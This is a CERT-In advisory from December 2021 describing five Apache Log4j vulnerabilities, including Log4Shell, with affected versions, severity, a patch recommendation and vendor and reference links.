CERT-In Advisory
CIAD-2021-0046
Multiple Vulnerabilities in Apache Log4j
Original Issue Date: December 10, 2021
Updated: December 30, 2021
Severity Rating: Critical
Systems Affected
Various implementations of:
- Apache Log4j 1.2
- Apache Log4j versions 2.0-alpha1 through 2.17.0
Overview
Multiple vulnerabilities have been reported in Apache Java logging library Log4j which could allow a remote attacker to gain full control or perform a denial of service (DoS) attack on the targeted servers.
Description
1. Remote Code Execution Vulnerability [Log4Shell]
(
CVE-2021-44228
)
This Vulnerability exists in Apache Log4jversions from 2.0-beta9 to 2.14.1(excluding 2.3.1 , 2.12.2 and 2.12.3) due to failure of JNDI features to protect against attacker controlled LDAP andother JNDI related endpoints.A remote attacker could exploit thisvulnerability by execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code and lead to gain full control on the targeted servers.
Note: This vulnerability is being actively exploited in the wild.
2. Remote Code Execution Vulnerability
(
CVE-2021-45046
)
This Vulnerability exists in Apache Log4j versions 2.0-beta9 to 2.15.0 (excluding 2.12.2) due to logging of non-default pattern layout with context lookup or control over thread context map (MDC) pattern. A remote unauthenticated attacker could exploit this vulnerability by injecting a crafted malicious payload using a JNDI Lookup pattern resulting in an information leak, remote code execution in some environments, and local code execution in all environments.
Note: only the log4j-core JAR file is impacted by this vulnerability. Applications using only the log4j-api JAR file without the log4j-core JAR file are not impacted by this vulnerability.
3. Denial of Service Vulnerability
(
CVE-2021-45105
)
This Vulnerability exists in ApacheLog4j versions 2.0-beta9 to 2.16.0 (excluding 2.12.3) due to failure to protect from uncontrolled recursion from self-referential lookups. A remote unauthenticated attacker could exploit this vulnerability by injecting a crafted malicious payload that contains a recursive lookup, resulting in a denial of service (DoS) condition.
Note: Only the log4j-core JAR file is impacted by this vulnerability. Applications using only the log4j-api JAR file without the log4j-core JAR file are not impacted by this vulnerability.
4. Remote Code Execution Vulnerability
(
CVE-2021-44832
)
This Vulnerability exists in ApacheLog4j versions 2.0-alpha7 to 2.17.0 (excluding 2.3.2 and 2.12.4) due to constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI. A remote attacker could exploit this vulnerability with permission to modify the logging configuration file to execute arbitrary code on the targeted system.
Note: Only the log4j-core JAR file is impacted by this vulnerability. Applications using only the log4j-api JAR file without the log4j-core JAR file are not impacted by this vulnerability.
5. Remote Code Execution Vulnerability
(
CVE-2021-4104
)
This vulnerability is due to deserialization of untrusted data in the Java logging library Apache Log4j in version 1.x. JMSAppender. This allows aremote attacker to execute code on the server if the deployed application is configured to use JMSAppender and to the attacker's JMS Broker.
Note: This vulnerability only affects applications which are specifically configured to use JMSAppender, which is not enabled the default, or when the attacker has write access to the Log4j configuration.Apache Log4j 1.2 reached end of life in August 2015.
Solution
Apply appropriate patches/mitigation steps as mentioned by various vendors.
Vendor Information
https://logging.apache.org/log4j/2.x/security.html
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd
https://security.paloaltonetworks.com/CVE-2021-44228
https://www.fortiguard.com/psirt/FG-IR-21-245
https://www.oracle.com/java/technologies/javase/products-doc-8u121-revision-builds-relnotes.html
https://access.redhat.com/security/vulnerabilities/RHSB-2021-009
https://ubuntu.com/blog/log4j-vulnerability-2021
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-44228
https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbgn04215en_us
https://kb.vmware.com/s/article/87092
https://aws.amazon.com/security/security-bulletins/AWS-2021-006/
https://www.docker.com/blog/apache-log4j-2-cve-2021-44228/
https://knowledge.broadcom.com/external/article?articleId=230308
https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032
https://www.ibm.com/support/pages/security-bulletin-vulnerability-apache-log4j-affects-websphere-application-server-cve-2021-44228
https://www.sophos.com/en-us/security-advisories/sophos-sa-20211210-log4j-rce
https://www.mongodb.com/blog/post/log4shell-vulnerability-cve-2021-44228-and-mongodb
https://forums.ivanti.com/s/article/Security-Bulletin-CVE-2021-44228-Remote-code-injection-in-Log4j?language=en_US
https://www.esri.com/arcgis-blog/products/arcgis-enterprise/administration/arcgis-software-and-cve-2021-44228-aka-log4shell-aka-logjam/
https://support.avaya.com/helpcenter/getGenericDetails?detailId=1399839287609
https://www.dell.com/support/kbdoc/en-in/000194414/dell-response-to-apache-log4j-remote-code-execution-vulnerability
https://www.elastic.co/blog/new-elasticsearch-and-logstash-releases-upgrade-apache-log4j2
https://nvidia.custhelp.com/app/answers/detail/a_id/5294
https://www.johnsoncontrols.com/-/media/jci/cyber-solutions/product-security-advisories/2021/jci-psa-2021-24.pdf
https://security.netapp.com/advisory/ntap-20211223-0007/
https://search.abb.com/library/Download.aspx?DocumentID=8DBD003132&LanguageCode=en&DocumentPartId=&Action=Launch
https://www.tp-link.com/us/support/faq/3255/
https://download.schneider-electric.com/files?p_enDocType=Security+and+Safety+Notice&p_File_Name=SESB-2021-347-01_Apache_Log4j_Log4Shell_Vulnerabilities_Security_Notification_V8.1+.pdf
https://struts.apache.org/announce-2022
https://struts.apache.org/announce-2021.html
https://www.ibm.com/support/pages/node/6538138
https://www.ibm.com/support/pages/node/6538148
https://www.dell.com/support/kbdoc/en-in/000194414/dell-response-to-apache-log4j-remote-code-execution-vulnerability
References
https://logging.apache.org/log4j/2.x/security.html
https://www.lunasec.io/docs/blog/log4j-zero-day/
https://github.com/tangxiaofeng7/apache-log4j-poc
https://www.randori.com/blog/cve-2021-44228/
https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance
https://blogs.oracle.com/security/post/log4j-vulnerabilities
https://www.ibm.com/blogs/psirt/an-update-on-the-apache-log4j-cve-2021-44228-vulnerability/
https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/
https://unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/
https://www.cisa.gov/uscert/ncas/alerts/aa21-356a
https://aws.amazon.com/blogs/publicsector/aws-resources-to-address-apache-log4j-vulnerabilities/
CVE Name
CVE-2021-44228
CVE-2021-45046
CVE-2021-4104
CVE-2021-45105
CVE-2021-44832
Disclaimer
The information provided herein is on "as is" basis, without warranty of any kind.
Contact Information
Email: info@cert-in.org.in
Phone: +91-11-24368572
Postal address
Indian Computer Emergency Response Team (CERT-In)
Ministry of Electronics and Information Technology
Government of India
Electronics Niketan
6, CGO Complex, Lodhi Road,
New Delhi - 110 003
India
|